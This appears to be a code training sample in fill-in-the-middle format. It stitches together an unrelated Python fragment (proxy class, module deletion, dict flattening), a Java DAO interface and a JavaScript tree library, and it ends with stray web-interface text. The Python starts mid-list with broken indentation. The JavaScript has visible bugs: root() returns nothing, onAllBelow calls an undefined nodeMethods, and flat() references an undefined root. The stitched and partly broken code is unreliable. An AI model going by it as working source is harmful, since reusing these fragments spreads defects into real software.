'__rtruediv__', '__rxor__', '__setitem__', '__setslice__', '__sub__',
'__truediv__', '__xor__', 'next',
]
@classmethod
def _create_class_proxy(cls, theclass):
"""creates a proxy for the given class"""
def make_method(name):
def method(self, *args, **kw):
return getattr(object.__getattribute__(self, "_obj"), name)(*args, **kw)
return method
namespace = {}
for name in cls._special_names:
if hasattr(theclass, name):
namespace[name] = make_method(name)
return type("%s(%s)" % (cls.__name__, theclass.__name__), (cls,), namespace)
    def __new__(cls, obj, *args, **kwargs):
        """
        Create a proxy instance wrapping `obj`.

        (obj, *args, **kwargs) are passed on to this class' __init__, so
        deriving classes can define an __init__ method of their own.

        note: _class_proxy_cache is unique per deriving class (each deriving
        class must hold its own cache).
        """
        try:
            # Deliberately read cls.__dict__ (not getattr): a subclass must
            # get its own cache instead of inheriting the parent's.
            cache = cls.__dict__["_class_proxy_cache"]
        except KeyError:
            cls._class_proxy_cache = cache = {}
        try:
            theclass = cache[obj.__class__]
        except KeyError:
            # First proxy for this wrapped type: build the specialised proxy
            # class once and memoize it.
            cache[obj.__class__] = theclass = cls._create_class_proxy(obj.__class__)
        ins = object.__new__(theclass)
        theclass.__init__(ins, obj, *args, **kwargs)
        return ins
def delete_module(modname, paranoid=None):
    """Remove module *modname* from sys.modules and scrub references to it.

    Based on http://stackoverflow.com/a/1668289.

    :param modname: name of the loaded module to delete.
    :param paranoid: optional finite list of symbol names that should also be
        deleted from every other loaded module (destructive; use with care).
    :raises ValueError: if the module is not loaded, or *paranoid* is not a
        sliceable sequence.
    """
    from sys import modules
    try:
        thismod = modules[modname]
    except KeyError:
        raise ValueError(modname)
    these_symbols = dir(thismod)
    if paranoid:
        try:
            paranoid[:]  # cheap sequence-support probe
        except TypeError:  # was a bare except: — only slicing failures are expected
            raise ValueError('must supply a finite list for paranoid')
        else:
            these_symbols = paranoid[:]
    del modules[modname]
    # Snapshot the values: delattr below can run arbitrary descriptor code,
    # and iterating a live sys.modules view is fragile.
    for mod in list(modules.values()):
        try:
            delattr(mod, modname)
        except AttributeError:
            pass
        if paranoid:
            # Scrub the requested symbols from *this* module. In the original
            # this block sat after the loop, so it only ever touched whatever
            # module `mod` last pointed at.
            for symbol in these_symbols:
                if symbol[:2] == '__':  # ignore special symbols
                    continue
                try:
                    delattr(mod, symbol)
                except AttributeError:
                    pass
def flatten(d, sep=None):
    """Flatten a data structure composed of dicts, sequences and scalars.

    Returns a tuple of (key, value) pairs. Each key is the tuple of key-path
    components leading to the scalar or, when *sep* is given, those
    components joined with *sep* into a single string.

    >>> flatten({"a": {"b": 2}}, sep=".")
    (('a.b', 2),)
    """
    # The ABCs moved to collections.abc in 3.3 and the old aliases on the
    # `collections` package were removed in 3.10 — importing from .abc keeps
    # this working on modern Python. Hoisted out of _flatten so it runs once.
    from collections.abc import MutableMapping, MutableSequence

    def _flatten(e, parent_key):
        if isinstance(e, MutableMapping):
            return tuple((parent_key + k2, v2)
                         for k, v in e.items()
                         for k2, v2 in _flatten(v, (k,)))
        elif isinstance(e, MutableSequence):
            return tuple((parent_key + k2, v2)
                         for i, v in enumerate(e)
                         for k2, v2 in _flatten(v, (i,)))
        else:
            # Scalars are wrapped in a 1-tuple so falsy values (None, 0, "")
            # survive intact until the final unwrapping below.
            return (parent_key, (e,)),

    return tuple((k if sep is None else sep.join(str(e) for e in k), v[0])
                 for k, v in _flatten(d, tuple()))
<|file_name|>Dao.java<|end_file_name|><|fim▁begin|>package de.klickreform.dropkit.dao;
import de.klickreform.dropkit.exception.DuplicateEntryException;
import de.klickreform.dropkit.exception.NotFoundException;
import de.klickreform.dropkit.models.DomainModel;
import java.io.Serializable;
import java.util.Collection;
/**
* Interface for Data Access Object (DAO) implementations that provide basic CRUD operations for a
* Data Access Layer.
*
* @author Benjamin Bestmann
*/
public interface Dao<E extends DomainModel,K extends Serializable> {
/** Returns every persisted entity of type E. */
public Collection<E> findAll();
/**
 * Returns the entity identified by {@code id}.
 * @throws NotFoundException when no entity with that id exists
 */
public E findById(K id) throws NotFoundException;
/**
 * Persists a new entity.
 * @return a String — presumably the new entity's id; confirm against implementations
 * @throws DuplicateEntryException when an equal entry already exists
 */
public String create(E entity) throws DuplicateEntryException;
/** Persists the entity, creating or updating as needed. */
public String createOrUpdate(E entity);
/**
 * Updates an existing entity.
 * @throws NotFoundException when the entity is not persisted
 * @throws DuplicateEntryException when the update collides with an existing entry
 */
public String update(E entity) throws NotFoundException, DuplicateEntryException;
/**
 * Removes the entity.
 * @throws NotFoundException when the entity is not persisted
 */
public void delete(E entity) throws NotFoundException;<|fim▁hole|><|fim▁end|>
}
<|file_name|>peas.js<|end_file_name|><|fim▁begin|>//
// peas.js
//
// tree data structure in javascript
//
//////////////////////////
var peas = function() {
// "sub" here is used as an object container for
// operations related to sub nodes.
// Each pea node will have a "sub" property
// with an instance of "sub"
var sub = function() {}
// the current node is accesable as "this.pea", from
// methods in the "sub" object
sub.prototype.pea = null
// first and last sub
sub.prototype.first = null
sub.prototype.last = null
// number of sub nodes
sub.prototype.n = 0
// get subnode at index position (0 index)
sub.prototype.at = function( index ) {
var pik,i
if( index > this.pea.sub.n - 1 )
return null
pik = this.pea.sub.first
for( i=0; i<index; i++ )
pik = pik.next
return pik
}
// add spare node at last position
// returns the added node
sub.prototype.add = function( spare ) {
if( this.pea.sub.last ) {
spare.prev = this.pea.sub.last
this.pea.sub.last.next = spare
this.pea.sub.last = spare
} else {
spare.prev = null
this.pea.sub.first = spare
this.pea.sub.last = spare
}
spare.top = this.pea
spare.next = null
this.pea.sub.n++
return spare
}
// insert sub node at index position
// returns the inserted node
sub.prototype.insertAt = function( spare, index ) {
var pik
// validate index given<|fim▁hole|> if( index < 0 )
throw "node insert failed, invalid index"
if( index > this.pea.sub.n )
throw "node insert failed, given index exceeds valid places"
// if insert at last+1, then just add
if( index == this.pea.sub.n ) {
this.pea.add( spare )
return
}
pik = this.pea.sub.at( index )
spare.prev = pik.prev
spare.next = pik
// if not inserting at first
if( pik.prev ) {
pik.prev.next = spare
} else {
// inserting as first
pik.top.sub.first = spare
}
pik.prev = spare
spare.top = this.pea
this.pea.sub.n++
return spare
}
// executes function "action" on each direct
// sub node (not recursive)
sub.prototype.each = function( action ) {
var node = this.pea.sub.first
while( node ) {
action( node )
node = node.next
}
}
///////////////////////////
// constructor function for pea nodes
peas = function( item ) {
this.sub = new sub()
this.sub.pea = this
this.item = item
}
peas.prototype.item = null
// top node
peas.prototype.top = null
// prev
peas.prototype.prev = null
// next
peas.prototype.next = null
// namespace for sub nodes
peas.prototype.sub = {}
// find the root node, of the tree
// of this node
peas.prototype.root = function() {
var node = this
while ( node.top ) node = node.top
}
// executes function func on all the tree
// nodes below (recursively)
peas.prototype.onAllBelow = function( action ) {
var node = this.sub.first
while( node ) {
action( node )
if( node.sub.n > 0 )
nodeMethods.each( action )
node = node.next
}
}
// removes this node from tree, leaving
// other tree nodes in consistent state
peas.prototype.rip = function() {
if( ! this.top ) return this
if( this.next )
this.next.prev = this.prev
if( this.prev )
this.prev.next = this.next
if( this.top.sub.last == this )
this.top.sub.last = this.prev
if( this.top.sub.first == this )
this.top.sub.first = this.next
this.top.sub.n--
this.top = null
this.next = null
this.prev = null
return this
}
// returns an array containing all nodes below this, in the tree
peas.prototype.flat = function() {
var flat = []
var grab = function( node ) {
flat.push( node )
}
root.onAllBelow( grab )
return flat
}
// puts spare node in the tree,
// before of this node.
// returns the inserted node
peas.prototype.putBefore = function( spare ) {
if( ! this.top )
throw "not in a tree"
if ( this.prev )
this.prev.next = spare
if( this.top.sub.first == this )
this.top.sub.first = spare
spare.next = this
spare.prev = this.prev
this.prev = spare
spare.top = this.top
this.top.sub.n++
return spare
}
return peas
}()<|fim▁end|> |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.